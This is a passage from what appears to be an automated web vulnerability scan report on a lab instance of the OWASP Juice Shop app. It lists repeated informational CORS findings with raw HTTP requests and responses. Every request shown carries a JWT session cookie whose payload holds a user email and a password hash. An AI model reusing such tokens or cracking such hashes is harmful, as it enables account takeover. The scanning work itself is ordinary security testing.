    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"bbc6-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"bbc6-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.63. http://192.168.61.143:3000/public/images/carousel/3.jpg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/3.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/3.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"e3aa-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"e3aa-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.64. http://192.168.61.143:3000/public/images/carousel/4.jpg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/4.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/4.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"18292-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"18292-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.65. http://192.168.61.143:3000/public/images/carousel/5.jpg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/5.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/5.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"cc28-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"cc28-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.66. http://192.168.61.143:3000/public/images/carousel/6.jpg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/6.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/6.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"1a365-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"1a365-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.67. http://192.168.61.143:3000/public/images/carousel/7.jpg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/7.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/7.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"a83f-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"a83f-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.68. http://192.168.61.143:3000/public/images/products/%7B%7Bproduct.image%7D%7D
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/%7B%7Bproduct.image%7D%7D

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/%7B%7Bproduct.image%7D%7D HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:01:06 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.69. http://192.168.61.143:3000/public/images/products/bower_components/angular-animate/angular-animate.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-animate/angular-animate.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-animate/angular-animate.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:22 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.70. http://192.168.61.143:3000/public/images/products/bower_components/angular-base64/angular-base64.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-base64/angular-base64.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-base64/angular-base64.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:23 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.71. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:35 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.72. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:54 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.73. http://192.168.61.143:3000/public/images/products/bower_components/angular-cookies/angular-cookies.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-cookies/angular-cookies.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-cookies/angular-cookies.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:56 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.74. http://192.168.61.143:3000/public/images/products/bower_components/angular-qrcode/angular-qrcode.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-qrcode/angular-qrcode.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-qrcode/angular-qrcode.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:16:58 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.75. http://192.168.61.143:3000/public/images/products/bower_components/angular-route/angular-route.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-route/angular-route.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-route/angular-route.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:09 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.76. http://192.168.61.143:3000/public/images/products/bower_components/angular-socket-io/socket.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-socket-io/socket.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-socket-io/socket.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:23 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.77. http://192.168.61.143:3000/public/images/products/bower_components/angular-touch/angular-touch.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-touch/angular-touch.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/angular-touch/angular-touch.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:17:29 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.78. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.
